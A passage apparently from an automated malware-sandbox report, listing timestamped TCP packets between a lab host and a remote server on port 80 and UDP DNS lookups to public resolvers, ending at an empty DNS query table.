Nov 23, 2020 12:19:16.647332907 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.647340059 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.647377968 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.647416115 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.647418976 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.647454977 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.647491932 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.647492886 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.647531986 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.647574902 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.648332119 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.649391890 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.689619064 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.689683914 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.690674067 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.723316908 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.727720976 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.796822071 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.796850920 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.796865940 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.796883106 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.796897888 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.796927929 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.797300100 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.801211119 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.872996092 CET	49737	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:17.067977905 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:17.187213898 CET	80	49737	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:17.668709993 CET	80	49737	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:17.668880939 CET	49737	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:17.672566891 CET	49737	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:17.942945004 CET	80	49737	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:18.842664957 CET	49744	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:18.842664957 CET	49743	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:19.108309984 CET	80	49744	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:19.109627008 CET	49744	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:19.114414930 CET	49744	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:19.129268885 CET	80	49743	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:19.129411936 CET	49743	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:19.420500040 CET	80	49744	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:20.069576025 CET	80	49744	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:20.069654942 CET	80	49744	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:20.069686890 CET	80	49744	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:20.069889069 CET	49744	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:20.069948912 CET	49744	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:20.074027061 CET	49744	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:20.339705944 CET	80	49744	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:21.113640070 CET	49743	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:59.795234919 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.068722010 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.068965912 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.069071054 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.385927916 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.715794086 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.715840101 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.715887070 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.715995073 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.716001987 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.716034889 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.716072083 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.716110945 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.716120958 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.716156006 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.716208935 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.716249943 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.716286898 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.716291904 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.716373920 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.989725113 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.989774942 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.989811897 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.989850044 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.989886045 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.989933014 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.989939928 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.989973068 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.989983082 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.990058899 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.990091085 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.990153074 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.990158081 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.990230083 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.990267992 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.990326881 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.990326881 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.990365028 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.990377903 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.990402937 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.990449905 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.990483999 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.990495920 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.990571022 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:00.990618944 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.990657091 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:00.991269112 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.088466883 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.088512897 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.088648081 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.264022112 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264070034 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264107943 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264146090 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264209986 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264244080 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.264260054 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264276981 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.264297009 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264367104 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264399052 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.264414072 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264492035 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.264492035 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264533997 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264621973 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264668941 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.264672995 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264713049 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.264719963 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264755964 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264816046 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.264858007 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.264904976 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.274740934 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.274787903 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.274835110 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.274876118 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.274894953 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.274914026 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.274951935 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.274957895 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.274990082 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.275026083 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.275027990 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.275063992 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.275100946 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.275106907 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.275146961 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.275186062 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.275190115 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.275228024 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.275265932 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.275266886 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.275302887 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.275340080 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.275341988 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.275377035 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.275425911 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.315814972 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.362150908 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.409676075 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.538252115 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.538343906 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.538383007 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.538420916 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.538458109 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.538490057 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.538494110 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.538520098 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.538532019 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.538641930 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.538677931 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.538686991 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.538733959 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.538753986 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.538803101 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.538839102 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.538863897 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.538922071 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.538973093 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.538994074 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.539055109 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.539069891 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.539143085 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.539233923 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.539273977 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.539274931 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.539310932 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.539350033 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.539365053 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.539470911 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.647371054 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.647480011 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.647547960 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.647586107 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.647593975 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.647622108 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.647655964 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.647660971 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.647742033 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.647751093 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.647839069 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.647936106 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.647973061 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.647974968 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.648011923 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.648044109 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.648049116 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.648106098 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.648164988 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.648263931 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.648303986 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.648343086 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.683119059 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.683244944 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.688138962 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.688175917 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.688209057 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.688250065 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.688258886 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.688302994 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:01.812583923 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.833714008 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.833734989 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:01.833880901 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:02.725779057 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:02.725991964 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:03.585108042 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:03.858584881 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:03.858633041 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:03.858665943 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:03.858735085 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:03.858792067 CET	49765	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:04.132227898 CET	80	49765	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:13.472692966 CET	49766	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:13.752351046 CET	80	49766	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:13.752512932 CET	49766	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:13.752633095 CET	49766	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:14.075851917 CET	80	49766	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:14.988385916 CET	80	49766	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:14.988488913 CET	49766	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:14.988621950 CET	49766	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:15.050283909 CET	49768	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:15.268137932 CET	80	49766	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:15.327203035 CET	80	49768	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:15.327306986 CET	49768	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:15.327480078 CET	49768	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:15.330399990 CET	49768	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:15.604386091 CET	80	49768	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:15.607285976 CET	80	49768	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:16.533633947 CET	80	49768	47.241.19.44	192.168.2.4
Nov 23, 2020 12:20:16.533725023 CET	49768	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:16.534030914 CET	49768	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:20:16.810949087 CET	80	49768	47.241.19.44	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2020 12:18:46.570199013 CET	49257	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:18:46.597249031 CET	53	49257	8.8.8.8	192.168.2.4
Nov 23, 2020 12:18:47.557322979 CET	62389	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:18:47.593255997 CET	53	62389	8.8.8.8	192.168.2.4
Nov 23, 2020 12:18:52.284771919 CET	49910	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:18:52.312025070 CET	53	49910	8.8.8.8	192.168.2.4
Nov 23, 2020 12:18:53.012953043 CET	55854	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:18:53.040066004 CET	53	55854	8.8.8.8	192.168.2.4
Nov 23, 2020 12:18:54.080920935 CET	64549	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:18:54.107846022 CET	53	64549	8.8.8.8	192.168.2.4
Nov 23, 2020 12:18:54.919960022 CET	63153	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:18:54.947187901 CET	53	63153	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:01.407439947 CET	52991	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:01.434551954 CET	53	52991	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:06.562824011 CET	53700	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:06.599641085 CET	53	53700	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:07.614770889 CET	51726	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:07.939614058 CET	53	51726	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:08.168842077 CET	56794	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:08.196083069 CET	53	56794	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:11.244085073 CET	56534	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:11.271193027 CET	53	56534	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:12.320729017 CET	56627	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:12.348102093 CET	53	56627	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:13.540397882 CET	56621	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:13.581149101 CET	53	56621	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:13.780139923 CET	63116	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:13.807528973 CET	53	63116	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:15.260731936 CET	64078	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:15.287969112 CET	53	64078	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:16.150295973 CET	64801	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:16.177867889 CET	53	64801	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:17.680984020 CET	61721	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:17.708213091 CET	53	61721	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:18.798482895 CET	51255	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:18.834115028 CET	53	51255	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:18.878098965 CET	61522	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:18.905194044 CET	53	61522	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:19.683197975 CET	52337	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:19.718893051 CET	53	52337	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:22.286604881 CET	55046	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:22.322698116 CET	53	55046	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:22.796526909 CET	49612	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:22.836855888 CET	53	49612	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:23.244935036 CET	49285	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:23.280853033 CET	53	49285	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:23.602293015 CET	50601	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:23.638015032 CET	53	50601	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:23.649595022 CET	60875	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:23.693440914 CET	53	60875	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:23.849045992 CET	56448	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:23.876090050 CET	53	56448	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:23.937958002 CET	59172	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:23.975613117 CET	53	59172	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:24.375437021 CET	62420	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:24.411318064 CET	53	62420	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:24.816014051 CET	60579	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:24.853601933 CET	53	60579	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:25.177424908 CET	50183	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:25.204924107 CET	53	50183	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:25.393731117 CET	61531	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:25.434168100 CET	53	61531	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:26.042188883 CET	49228	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:26.078011036 CET	53	49228	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:26.454986095 CET	59794	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:26.490641117 CET	53	59794	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:36.530822039 CET	55916	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:36.566790104 CET	53	55916	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:37.518486977 CET	55916	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:37.554110050 CET	53	55916	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:38.533106089 CET	55916	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:38.560381889 CET	53	55916	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:39.905623913 CET	52752	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:39.942928076 CET	53	52752	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:40.548924923 CET	55916	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:40.584266901 CET	53	55916	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:44.549137115 CET	55916	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:44.584777117 CET	53	55916	8.8.8.8	192.168.2.4
Nov 23, 2020 12:19:59.753671885 CET	60542	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:19:59.789554119 CET	53	60542	8.8.8.8	192.168.2.4
Nov 23, 2020 12:20:09.503115892 CET	60689	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:20:09.530307055 CET	53	60689	8.8.8.8	192.168.2.4
Nov 23, 2020 12:20:09.535417080 CET	60690	53	192.168.2.4	208.67.222.222
Nov 23, 2020 12:20:09.552117109 CET	53	60690	208.67.222.222	192.168.2.4
Nov 23, 2020 12:20:09.553596020 CET	60691	53	192.168.2.4	208.67.222.222
Nov 23, 2020 12:20:09.570106983 CET	53	60691	208.67.222.222	192.168.2.4
Nov 23, 2020 12:20:09.586766005 CET	60692	53	192.168.2.4	208.67.222.222
Nov 23, 2020 12:20:09.603360891 CET	53	60692	208.67.222.222	192.168.2.4
Nov 23, 2020 12:20:13.144649029 CET	64206	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:20:13.472007036 CET	53	64206	8.8.8.8	192.168.2.4
Nov 23, 2020 12:20:14.278291941 CET	50904	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:20:14.305594921 CET	53	50904	8.8.8.8	192.168.2.4
Nov 23, 2020 12:20:15.013784885 CET	57525	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:20:15.049266100 CET	53	57525	8.8.8.8	192.168.2.4
Nov 23, 2020 12:20:17.777049065 CET	53814	53	192.168.2.4	8.8.8.8
Nov 23, 2020 12:20:17.820941925 CET	53	53814	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
